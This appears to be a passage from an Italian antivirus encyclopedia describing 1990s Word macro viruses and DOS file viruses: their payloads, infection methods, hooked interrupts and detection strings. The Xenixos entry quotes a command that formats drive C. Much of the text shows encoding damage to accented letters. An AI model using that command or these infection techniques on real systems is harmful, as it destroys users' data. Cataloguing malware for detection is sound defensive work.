origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Wazzu.H Φ una variante scritta recentemente di Wazzu. Ciascuna delle sue 6 procedure Φ attivata con una probabilitα su sei. Una procedura mostra il seguente messaggio: " Thank's for using Microsloth Warp for Windblowz " Altre procedure creano 20 nuovi documenti o cancellano tutti i file della directory principale (C:\*.*). Wazzu.H infetta il modello di documento principale quando un documento infetto viene aperto. Anche altri file si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.I] Nome del virus: Word.Wazzu.I Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 333 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.I Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.J] Nome del virus: Word.Wazzu.J Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 675 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione e l'originale virus Wazzu.A Φ che sono stati cancellati alcuni spazi dalla macro del codice virale. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.K] Nome del virus: Word.Wazzu.K Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 632 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.K Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.L] Nome del virus: Word.Wazzu.L Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 347 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.L ha alcuni codici modificati. Infetta il modello di documento principale quando Φ aperto un documento infetto. Anche altri documenti divengono infetti quando vengono aperti (AutoOpen). Quando un utente apre un documento, Wazzu.L aggiunge il seguente testo alla fine del documento: " wazzu! " [Word_Wazzu.M] Nome del virus: Word.Wazzu.M Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 443 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.M Φ un altro virus da macro con alcuni codici modificati e una procedura alterata. A causa dell'alterazione, Word mostra un messaggio d'errore. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.N] Nome del virus: Word.Wazzu.N Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 432 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che il codice Φ stato leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.O] Nome del virus: Word.Wazzu.O Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 309 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.O Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.P] Nome del virus: Word.Wazzu.P Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 460 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione e l'originale virus Wazzu.A α che le procedure sono state cancellate dal codice. Wazzu.P Φ ancora in grado di infettare il modello di documento principale quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.Q] Nome del virus: Word.Wazzu.Q Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 331 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.Q Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.R] Nome del virus: Word.Wazzu.R Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 552 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Wazzu.R Φ una variante di minor importanza di Wazzu.F con alcuni codici aggiunti. C'Φ una probabilitα su dieci che Wazzu.R mostri il seguente messaggio: " This one's for you, Bosco. " Wazzu.R Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.S] Nome del virus: Word.Wazzu.S Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 343 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.S Φ un altro virus da macro con alcuni codici modificati e una procedura alterata. A causa dell'alterazione, Word mostra un messaggio d'errore. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.T] Nome del virus: Word.Wazzu.T Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 431 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.T Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.U] Nome del virus: Word.Wazzu.U Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 621 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.U ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.V] Nome del virus: Word.Wazzu.V Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 375 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.V Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). Nel proprio codice contiene anche il seguente commento: " REM This macro wipes out the Wazzu Virus! " [Word_Wazzu.W] Nome del virus: Word.Wazzu.W Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 332 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.W Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.X] Nome del virus: Word.Wazzu.X Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 617 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.X Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). Wazzu.X Nel proprio codice contiene anche il seguente commento: " The Meat Grinder virus - Thanks to Kermit the Frog, " " ' and Kermit the Protocol " Wazzu.X Φ in grado di convertirsi al formato di Word97 (Word8). [Word_Wazzu.Z] Nome del virus: Word.Wazzu.Z Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 666 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.Z ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.Y] Nome del virus: Word.Wazzu.Y Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 652 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale virus Wazzu.A Φ che alcune TABs sono state rimpiazzate da spazi nelle istruzioni. Ci≥ non ha effetti sul comportamento di questa nuova variante . Per ulteriori informazioni, vedere la descrizione di Wazzu.A virus. [Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)] Nome del virus: Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoOpen, AutoClose Lunghezza della Macro: 638 Byte Paese di origine: Germania Data di origine: Primavera 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Wieder non Φ un virus ma un cavallo di Troia. Non infetta altri file. Quando viene aperto un documento infetto, Wieder crea la directory "C:\TROJA", e sposta il file di sistema "C:\AUTOEXEC.BAT" nella nuova cartella. Dopo aver spostato il file, i file originali vengono cancellati. Quando si chiude un documento infetto, vengono mostrati i seguenti messaggi: " Auf Wieder÷ffnen " " P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei " " gerne wiederhaben moechten, sollten Sie einen " " Blick in das neue Verzeichnis C:\TROJA werfen... " Il documento originale, Che include il cavallo di Troia, ha i seguenti messaggi: " Trojanisches Pferd " " Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT- " " Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben " " Sie eine Kopie davon ? " " Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen " " und mit ein klein wenig mehr Aufwand koennte man auch einen " " Virus installieren. " [Word_Xenixos.A (a.k.a. Nemesis, Evil One, XOS)] Nome del virus: Word.Xenixos.A (a.k.a. Nemesis, Evil One, XOS) Tipo di Virus: Virus da macro di Word Numero di Macro: 11 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, DateiBeenden, DateiDrucken, DateiDruckenStandard, DateiOeffnen, DateiSpeichern, SateiSpeichernUnter, Drop, Dummy, ExtrasMakro Lunghezza della Macro: 31342 Byte Paese di origine: Austria Data di origine: Febbraio 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Xenixos Φ il primo virus da macro scritto espressamente per la versione tedesca di Microsoft Word. Tutti i nomi delle macro sono in tedesco, quindi Φ attivo solamente con la versione tedesca di Word L'infezione del modello principale (NORMAL:DOT) include anche le seguenti macro: "AutoClose" "AutoExit" "AutoNew" Quando viene aperto un documento infetto, Xenixon infetta il modello principale a meno che la macro "DateiSpeichernUnter" sia ancora presente. Xenixon si diffonde usando "DateiSpeichern" (salva file) e "DateiSpeichernUnter" (Salva file come..."). Tutte la macro sono Execute-Only, quindi non possono essere viste o modificate. I file chiamati "VIRUS.DOT" non saranno infettati. Durante l'infezione, Xenixon controlla la data del sistema e attiva diversi meccanismi (procedure) distruttivi regolati con la data. Durante il mese di Maggio aggiunge a "C:\AUTOEXEC.BAT" il seguente testo: " @echo j format c: /u > nul " Questo comando formatterα l'unitα C:\ Durante il mese di Marzo, Xenixos cerca di attivare il virus per DOS "Neuroquila" usando lo script DOS DEBUG. Questa parte del virus Φ imperfetta (cerca di creare un file con estensione .EXE) e quindi il virus per DOS non infetterα mai il sistema. Il terzo meccanismo distruttivo valuta l'ora del sistema e in caso di valori pi∙ grandi di 45 nel campo dei secondi, aggiungerα la password "XENIXOS" al documento salvato. Durante la stampa di un documento, Xenixos valuta ancora la data del sistema, e in caso di valori minori di 30 nel campo dei secondi aggiungerα alla fine del documento stampato la seguente scritta: " Nemesis Corp. " Xenixos inoltre sostituisce Tools|Macro per rendere l'individuazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Il nuovo codice mostra il seguente messaggio d'errore invece di attivare la macro di Word. viewer/editor: " Diese Option ist derzeit leider nicht verfuegbar " In pi∙ Xenixos sostituisce la sezione "Compatibility" all'interno del file WIN.INI. Stabilisce la variabile "RR"CD" nel valore "0x0020401" e la variabile "Diag$" allo "0". La variabile "WIN.INI" pu≥ essere usata per disattivare il virus. Impostando la variabile "Diag$" su "1" si potranno prevenire la maggior parte dei meccanismi distruttivi. [Word_Xenixos.B] Nome del virus: Word.Xenixos.B Tipo di Virus: Virus da macro di Word Numero di Macro: 11 (24) Criptato: Si Nomi delle Macro: Drop, Dummy, AutoExec, AutoOpen, DateiOEffnen, ExtrasMakro, DateiBeenden, DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard Lunghezza della Macro: 31342 Byte Paese di origine: Germania Data di origine: Febbraio 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale Xenixos.A i primi 4 Byte della macro "DateiDruckenStandard" sono cambiati. Questa nuova variante Φ ancora attiva ed infetta altri documenti. Xenixos.B lavora solamente con la versione tedesca di Word, dato che i nomi delle macro sono in tedesco. Per ulteriori informazioni, vedere la descrizione di Xenixos.A virus. [Word_Zero.A:De] Nome del virus: Word.Zero.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: dok, dsu, wrd, extrasmakro, dateischliessen, dateispeichern, dateidokvorlagen,dokumentschliessen, dateispeichernunter Lunghezza della Macro: 727 Byte Paese di origine: Germania Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Zero usa una nuova tecnica di infezione. Invece di infettare il modello di documento principale (normal.dot), crea un file (0.DOT) nella cartella "STARTUP" (default: C:\MSOFFICE\WINWORD\STARTUP). Zero si attiva quando si seleziona l'opzione "DokumentSchliessen" o "Extrasmacro". Dopo aver creato un file 0.dot copia le macro del virus nel documento attivo quando viene selezionata l'opzione "DateiSpeichern" o "DateiSpeichernUnter". Zero usa anche "Extrasmacro" per rendere l'individuazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). [Word_Generic] Nome del virus: Word.Generic (ogni virus da macro sconosciuto) Tipo di virus: Virus da macro di Word Numero di Macro: Dipendente dal virus Criptato: Dipendente dal virus Nomi delle Macro: Dipendente dal virus Lunghezza della Macro: Dipendente dal virus Paese di origine: Ovunque Data di origine: Dipendente dal virus Distruttivo: Dipendente dal virus Rilevato In The Wild: Dipendente dal virus Descrizione: "Word.Generic Macro Virus" Φ il generico nome usato dalla "Trend Micro's antivirus researchers" per descrivere i virus da macro di origine sconosciuta e per individuarne la procedura con MacroTrap. Diversamente dalle metodologie normalmente usate per evidenziare virus conosciuti, la Trend Micro MacroTrap identifica i virus da macro che non sono stati mai precedentemente evidenziati dai ricercatori di antivirus. Alcuni virus possono esistere sia "in the Wild" (virus che infettano degli utenti) oppure "in the Zoo," (virus conosciuti solamente dai ricercatori di antivirus). Prima che un prodotto antivirus possa scoprire e pulire della macro di virus sconosciute, il virus deve essere trovato ed isolato. Il virus Φ quindi analizzato per capire le sue procedure di danneggiamento ed una "segnatura" Φ sviluppata cos∞ il virus pu≥ essere velocemente identificato e rimosso dai file infetti. La segnatura Φ incorporata nel pattern file del virus che Φ reso accessibile al pubblico, normalmente a intervalli bisettimanali . Ma dato che Φ facile creare e diffondere virus da macro, non Φ possibile fare affidamento solamente sui virus pattern ed aggiornare le segnature per identificare la quantitα dei nuovi virus da macro. Considerando che i "virus kits" sono ora disponibili su Internet, e considerando la grande quantitα di e-mail, l'unica soluzione a lungo termine contro l'enorme quantitα di virus da macro sono le regole della Trend basate su MacroTrap. Le macro da virus sconosciuti variano in complessitα e variano dall'innocuo ( Esempio l'originale virus Word.Concept) a quello particolarmente distruttivo (Esempio, Word.MDMA, cancella tutti i file dell'hard disk). Quando MacroTrap rileva e pulisce i file infettati da virus da macro di Word, viene eliminato sia il virus che la macro. Possono essere cancellate o isolate, a seconda delle preferenze dell'utente. Trend Micro Φ la prima a sviluppare questa tecnologia ed abbiamo incorporato nella nostra completa linea di prodotti antivirus, per aumentare il nostro "award winning 32-bit", motore di scansione multi-threading. [Jerusalem.1244] Tipo di Virus: Virus da file Altri nomi: Lunghezza del Virus: 1456 Byte Modalitα di infezione: non reinfettante Luogo d'origine: Tipo di memoria: MCB Vettore PC agganciato: Int 21h, Int 8h Metodo di infezione: 1) Modifica la memoria allocata, BX=5Eh e ES=114Ch intercettando l'int 21h, lo imposta all'interrupt, questa volta intercettando l'int 8h e lo imposta. 2) Controlla che la data di sistema sia l'1 Gennaio, Se "SI" sposta il valore di 0h a DS:[0003]; lo porta immediatamente a DS:[0003]. 4) Restituisce l'indirizzo 114ch a ES quindi prende i dati memorizzati in ES:[2C] e li mette ES. Quindi libera la memoria, all'indirizzo ES=1043 del paragrafo di partenza dei blocchi di memoria. 4) Va al codice di ritorno figlio, termina e rimane residente in memoria [Jerusalem.1500] Tipo di Virus: Virus da file Lunghezza del Virus: 2160 Byte Modalitα di reinfezione: non reinfettante Luogo d'origine: Tipo di memoria: MCB Vettore PC agganciato: Int 21h Metodo di infezione: 1) Imposta una nuova data di sistema ma la data specificata non Φ valida. 2) Modifica la memoria BX=80h e ES=114Ch. [Mummy-2]. Tipo di Virus: Virus da file. Lunghezza del Virus: 1648 Byte. Tipo di memoria infettata: MCB . Vettore PC agganciato: Int 21h. Metodo di infezione: 1) Cripte la data trovata dall'indirizzo 1152:049Eh a 1152:04E5h e compone "PC Virus Mummy Ver. 2.1.Kaohsiung Senior School Tzeng Jau Ming presents" poi salva l'indirizzo di ES in CS:[494], [458], [442], [446], [44A]. 2) Aggiunge 10h all'indirizzo di ES e lo memorizza in CS:[400] e [45C]. 3) Sposta l'header originale del programma per essere pronto all'esecuzione, modifica la memoria allocata, ed ottiene il vettore dell'interrupt. 4) Salva il valore di ES e BX all'indirizzo CS:[044C] e CS:[044E] rispettivamente. 5) Esegue il programma figlio. Metodo di rilevazione: Cercare il seguente messaggio: "PC Virus Mummy Ver 2.1 Kaohsiung Senior School Tzeng Jan Ming presents" [Jers-Zero-Aust.A] Tipo di Virus: Virus da file Lunghezza del Virus: 2000 Byte Condizioni d'attivazione: Deve essere scaduto il 1992 , il giorno deve essere venerd∞ Modalitα di reinfezione: non reinfettante Tipo di memoria: MCB Vettore PC agganciato: Int 21h Metodo di infezione: Il virus Φ ovviamente di tipo softmice, essendo criptati CS:[SI] o 114C:[11E] a 114C:[7AD] facendo un XOR con valore esadecimale 0Eh, quindi cripta CS:[SI] nuovamente ma questa volta da 115C:[EB] a 115C:[159], XOR da 1Eh, IEh aumenta di 1, aggancia fino a 6Fh. Quindi salva ES che Φ 114C in quattro diversi punti. Aggiunge quindi 10h a 114Ch e salva in CS:[0115] aggiungendo ci≥ che vi Φ immagazzinato e CS:[0111]. Quindi sostituisce la data di memorizzazione DS:SI con ES:DI che sono le stesse. Non sono state eseguite sostituzioni. Modifica quindi la memoria allocata, BX=9Bh e ES=114Ch. Ottiene l'interrupt intercettando Int 21h, quindi lo imposta. Controlla che l'anno sia almeno il 1992 e che il giorno sia venerd∞. Libera quindi la memoria allocata poi acquisisce il processo generato. Infine termina e resta in memoria. Mentre Φ in memoria, il virus infetta ogni file con estensione *.COM e/o *.EXE. Non si carica se Φ giα in memoria. [MacGyver.2803.A] Tipo di Virus: Virus da file (file con estensione *.EXE) Lunghezza del Virus: 2803 Byte Tipo di memoria: MCB Residente in memoria Luogo d'origine: Vettore PC agganciato: INT 01h, INT 21h Metodo di infezione: 1) Sposta il suo code in memoria vicino alla MCB. 2) Il codice Φ residente in memoria. 3) Da il controllo a dove era stato trasferito il codice e quindi chiama la funzione "Get DOS Version No." 4) Intercetta l'INT 1 e l'INT 21. 5) Modifica il blocco di memoria e aggiunge 3072 Byte. Nota: Questo virus intercetta l'INT 01h (un interrupt a passo singolo usato da un debugger come DEBUG e LDR). [Backform.2000.A1] Tipo di Virus: Virus da file (File con estensione *.COM) Lunghezza del Virus: 1855 Byte Tipo di memoria: Non residente in memoria Luogo d'origine: Vettore PC agganciato: Metodo di infezione: 1) Cerca COMMAND.COM in drive C. Se non lo trova, il virus si disattiva. Se il file Φ presente, controlla che il suo primo byte sia un'istruzione di salto (E9H). Se "SI" lo infetta; se "NO", il virus si disattiva senza lasciare danni al file. Dopo essersi agganciato al file il virus viene eseguito ogni volta che viene avviato il sistema. 2) Controlla che il mese corrente sia giugno. Se "SI", cerca ed infetta i file con estensione *.COM in drive A. Danni: Metodo di rilevazione: I file infetti incrementano le loro dimensioni di 2051 Byte. Note: [Vacsina_2] Pseudonimo: VACSINA Luogo d'origine: Tipo di Virus: Virus da file Lunghezza del Virus: Tipo di reinfezione: Non reinfetta Tipo di memoria: Tipo MCB Vettore PC agganciato: INT 21h Metodo di infezione: 1) Si carica in memoria alta. Carica 1216 Byte nella memoria. 2) Infetta i file con estensione *.COM e *.EXE. Copia il codice del virus nel programma ospite. Prima di girare nel programma ospite il virus si carica. Mentre Φ in memoria, infetta tutti i file che vengono aperti. Note: Il virus cerca di creare un nuovo indirizzo per far girare il suo codice. Questo serve per far interagire il programma ospite con il virus. Utilizzando l'Int 21, funzione 50. Quello che fa principalmente, Φ comunicare al sistema operativo che il codice TSR Φ il processo principale invece del programma. Questo crea una esecuzione iniziale piuttosto che eseguire prima il codice originale. In questo modo il virus Φ in grado di girare e poi di copiarsi nel programma ospite usando l'Int 21, funzioni 35 e 25. L'operazione di copiatura termina quando il codice del virus imposta il DTA. Con questa procedura il virus pu≥ inserirsi nel programma ospite e girare in futuro. [BADSECTOR.3428] Nome del Virus: BADS3428 Tipo di Virus: Parassita, Virus da file (File con estensione *.COM) Lunghezza del Virus: 3,434 Byte Nome originale: BAD SECTOR 1.2 Tipo di memoria: residente in memoria alta Luogo d'origine: Vettore PC agganciato: INT 8h, INT 16h, INT 26h, INT 21h, INT 25h Metodo di infezione: Il virus infetta solo i file con estensione *.COM. Incrementa la lunghezza di un file infetto di 3,434 Byte. Il virus infetta il file ospite attaccandosi alla fine del file. Il virus risiede in memoria quando si carica ed esegue un file infetto. Mentre Φ in memoria pu≥ alterare altri file con estensione *.COM nel disco quando viene aperto o copiato un file e a volte causare un errore di assegnazione in memoria. E' inoltre in grado di nascondere la variazione di lunghezza dei file infetti quando Φ in memoria. Il virus replica il suo codice in memoria alta nel 9EC0:0000 e l∞ vi rimane. Aggancia l'INT 21 e imposta il proprio vettore per aggiungere il proprio programma in memoria alta all'indirizzo 9EC0:002A. Utilizza questa modifica per attaccarsi al programma ospite. Aggancia anche altri interrupt come ad esempio INT 8H (9EC0:0876), INT 16H (9EC0:08A5), INT 25H (9EC0:0FBC), e INT 26H (9EC0:0FC6), ma non si vede nessuna procedura. Il virus si replica e altera i file con estensione *.COM presenti. Nel codice del virus si pu≥ trovare la seguente stringa: "Bad Sectors 1.2" "COMEXE" Danni: Altera file eseguibili. Metodo di rilevazione: I file infetti incrementano le loro dimensioni di 3,434 Byte. Note: [Tai-Pan.438.A] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 438 Byte Tipo di memoria: Memoria alta Vettore PC agganciato: INT 21h Metodo di infezione: 1) Si carica in memoria alta. Carica in memoria circa 512 Byte. 2) Infetta i file con estensione *.EXE. Copia il codice del virus in memoria alta aggiungendo circa 438 (01B6H) Byte. Prima di far girare il programma ospite, si carica in memoria. Mentre Φ in memoria, infetta i file con estensione *.EXE che vengono aperti. Il virus di solito reagisce creando uno spazio nella memoria prima di infettare i file, usando l'Int 21 (48). Non succede niente di strano. Attacca il suo codice al programma ospite dopo che Φ stato caricato dalla memoria. Danni: Sintomi: Diminuisce la memoria libera. Aumenta la lunghezza del file. Nel codice del virus pu≥ comparire: "[Whisper Presenterar Tai-Pan]" Metodo di rilevazione: Ricerca il suddetto messaggio. [Tai-Pan.438.A] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 438 Byte Tipo di memoria: Memoria alta Vettore PC agganciato: INT 21h Metodo di infezione: 1) Si carica in memoria alta. Carica circa 512 Byte nella memoria. 2) Infetta i file con estensione *.EXE. Copia il codice del virus nel programma ospite aggiungendo circa 438 (01B6H) Byte. Carica il virus prima di eseguire il programma ospite. Mentre Φ in memoria, infetta i file con estensione *.EXE che vengono aperti. Il virus di solito reagisce creando uno spazio nella memoria prima di infettare i file, usando l'Int 21 (48). Non succede niente di strano. Attacca il suo codice al programma ospite dopo che Φ stato caricato dalla memoria. Sintomi: Diminuisce la memoria libera. Aumenta la lunghezza del file. Nel codice del virus pu≥ comparire: "[Whisper Presenterar Tai-Pan]" Metodo di rilevazione: Ricerca il suddetto messaggio. [Tai-Pan.666] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 666 Byte Tipo di memoria: Memoria alta Vettore PC agganciato: INT 21h 1) Si carica in memoria alta. Carica circa 710 Byte nella memoria. 2) Infetta i file con estensione *.EXE. Copia il codice del virus nel programma ospite aggiungendo circa 666 (029AH) Byte. Carica il virus prima di eseguire il programma ospite. Mentre Φ in memoria, infetta i file con estensione *.EXE che vengono aperti. Il virus di solito reagisce creando uno spazio nella memoria prima di infettare i file, usando l'Int 21 (48). Non succede niente di strano. Attacca il suo codice al programma ospite dopo che Φ stato caricato dalla memoria. Sintomi: Diminuisce la memoria libera. Aumenta la lunghezza del file. Nel codice del virus pu≥ comparire: "DOOM2,EXE. Illegal DOOM II signature" "Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2" "Say bye-bye HD" "The programmer of DOOM II DEATH is in no way affiliated with ID Software." "ID Software is in no way affiliated with DOOM II DEATH." Metodo di rilevazione: Ricerca il suddetto messaggio. [Keypress-9] Tipo di Virus: Virus da file (File con estensione *.COM e *.EXE) Luogo d'origine: Tipo di memoria: Vettore PC agganciato: INT 21h Metodo di infezione: Il virus intercetta l'INT 21h per infettare i file con estensione *.COM e *.EXE, aumentando la loro lunghezza di 2 kByte. Dopo che Φ in esecuzione, il virus aspetta un file con estensione *.EXE e/o *.COM per infettarlo. Infetta tutti i file con estensione *.COM e *.EXE tranne il COMMAND.COM. I file infetti contengono i seguenti messaggi: "This is an [ illegal copy ] of keypress virus remover" "Systems Halted." "Eternal Fair" Il virus non reinfetta file giα infetti. [BBS.1643] Tipo di Virus: Virus da file, Soft Mice (file con estensione *.EXE). Pseudonimo: Major BBS. Lunghezza del Virus: 1642-1644 Byte. Solo Tipo di memoria: Residente in memoria alta. Vettore PC agganciato: INT 21h, INT 8h. Metodo di infezione: 1) Decripta 1595 Byte del suo codice. 2) Controlla che un file eseguito sia giα stato infettato. Se "NO", il virus vi copia il suo codice criptato. Copia quindi il suo codice di 1644 Byte in memoria alta ma inserisce in tutto 30384 Byte in memoria. 3) Acquisisce la sezione flag del DOS, che il DOS stesso cerca quando viene usato l'INT 21 4) Intercetta l'INT 21 e l'INT 8 e poi si disattiva. Danni: Questo virus non apporta danni evidenti ma decifra questo messaggio: "The Major BBS Virus" "created by Major tomTugger" Metodo di rilevazione: Questo virus mostra un errore protetto da scrittura quando viene eseguito un programma di lettura (come l'apertura di un file). [Maltese_Amoeba] Tipo di Virus: Virus da file, Soft Mice Pseudonimo: AMOEBA Lunghezza del Virus: 3589 Byte Condizioni d'attivazione: 1 Nov., 15 Mar. Tipo di memoria: Residente in memoria alta Luogo d'origine: Malta Vettore PC agganciato: INT 21h Metodo di infezione: 1) Decripta 1184 Byte del suo codice. 2) Controlla che il file eseguito sia un file con estensione *.EXE o *.COM non infetto. Se 